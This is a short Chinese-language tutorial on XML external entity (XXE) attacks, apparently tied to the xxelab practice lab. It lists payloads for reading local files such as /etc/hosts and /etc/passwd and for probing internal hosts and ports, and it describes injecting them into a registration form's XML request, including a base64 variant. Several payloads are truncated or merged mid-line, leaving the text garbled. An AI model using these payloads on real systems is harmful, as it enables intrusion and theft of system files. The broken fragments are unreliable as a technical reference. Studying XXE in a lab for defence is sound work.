利用xxe获取linux系统的passwd

利用xxe获取linux系统的passwd

引用外部DTD文件访问内网主机/端口。

<!DOCTYPE a SYSTEM "（看响应时间）

引用外部DTD文件访问wai网。

<!DOCTYPE a SYSTEM ">

引用内部实体。

<!DOCTYPE a [<!ENTITY xxe "findneo">]><a>&xxe;</a>

外部实体读本地文件。

<!DOCTYPE a [<!ENTITY xxe SYSTEM "file:///etc/hosts">]><a>&xxe;</a>

外部实体访问内wang主机端口。

<!DOCTYPE a SYSTEM "a [<!ENTITY xxe SYSTEM "run -d -p 8082:80 rrodrigo/xxelab

抓取注册包，发现采用xml格式传递，且邮箱有返回：

将返回内容处进行xxe回显设置读取/etc/passwd

]>

利用base64编码进行xxe，防止有返回包验证

]>

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。